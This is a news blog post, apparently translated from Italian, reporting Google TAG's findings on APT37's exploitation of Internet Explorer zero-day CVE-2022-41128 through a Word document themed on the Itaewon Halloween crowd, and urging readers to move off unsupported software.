Internet Explorer was taken out of support by Microsoft on June 15, 2022, unfortunately continuing to use it (many companies do it, they persist in keeping obsolete software together with Windows 7 and in the worst case XP) means submitting to considerable risks for security.
An Internet Explorer zero-day vulnerability has been actively exploited by an unknown North Korean perpetrator to target South Korean users by exploiting the recent crowd of Itaewon Halloween to trick users into downloading malware.
The discovery, reported by Google Threat Analysis Group researchers Benoît Sevens and Clément Lecigne, is the latest series of attacks perpetrated by the ScarCruft group, also known as APT37, InkySquid, Reaper and Ricochet Chollima.
“Over time, the group has focused its efforts on South Korean users, North Korean defectors, policy makers, journalists, and human rights activists.“, has stated TAG in an analysis on Thursday.
How does this vulnerability of the now deprecated Internet Explorer work?
The new findings show continued abuse by authors, exploiting Internet Explorer flaws such as CVE-2020-1380 and CVE-2021-26411 to use backdoors known as BLUELIGHT and Dolphin; the latter was discovered by Slovak cybersecurity firm ESET late last month.
Another key tool in his arsenal is RokRata Windows-based remote access trojan that has a wide range of functions that allow it to take screenshots, log keystrokes, and even gather information about Bluetooth devices.
The attacks observed by Google TAG show the use of a malicious Microsoft Word document that was uploaded to VirusTotal on October 31, 2022; the abuse of another Internet Explorer zero-day flaw in the JScript9 JavaScript engine, CVE-2022-41128, which was settled from Microsoft last month.
The file references the October 29 incident in Seoul’s Itaewon Ward and exploits public interest in the tragedy to have users unknowingly open an exploit for the vulnerability upon opening it; in fact the attack is made possible by the fact that Office renders the HTML content using Internet Explorer.
As shows the MalwareHunterTeamthe same Word file was previously shared by the Shadow Chaser Group on October 31, 2022, describing it as a “interesting DOCX injection template sample” originally from Korea.
Exploitation of this vulnerability is followed by delivery of shellcode that clears all traces by clearing Internet Explorer’s cache and history and downloading the next stage payload.
Google TAG said it was unable to recover the subsequent malware used in the campaign, although it is suspected to have involved the implementation of RokRat, BLUELIGHT or Dolphin.
Why don’t many people upgrade?
Unfortunately in the world (not only in Italy, unfortunately), there is the “mania”, the habit of not reading the press releases of the parent company (Microsoft in the case of Windows 7, Internet Explorer, etc.), because it is taken for granted, ignorantly, that “once we learn things, we’re good to go“.
Know that the windows updates weren’t done because the developers woke up one day and said “we invent windows updates“, there are cyber security reasons behind it.
Of course, if you don’t live in South Korea and if you don’t have relations with this state via the Internet because maybe you know Korean, you certainly have nothing to fear.
The fact is that the disposal of software (such as Internet Explorer) or operating systems (Windows 7, XP, etc.) is not something to be taken lightly and say “but yes, I’ll continue what do you want it to be?”, there are of the leaks that over time will get bigger and bigger like a ship that is taking on water without the captain realizing it.
#Internet #Explorer #zeroday #exploited #hackers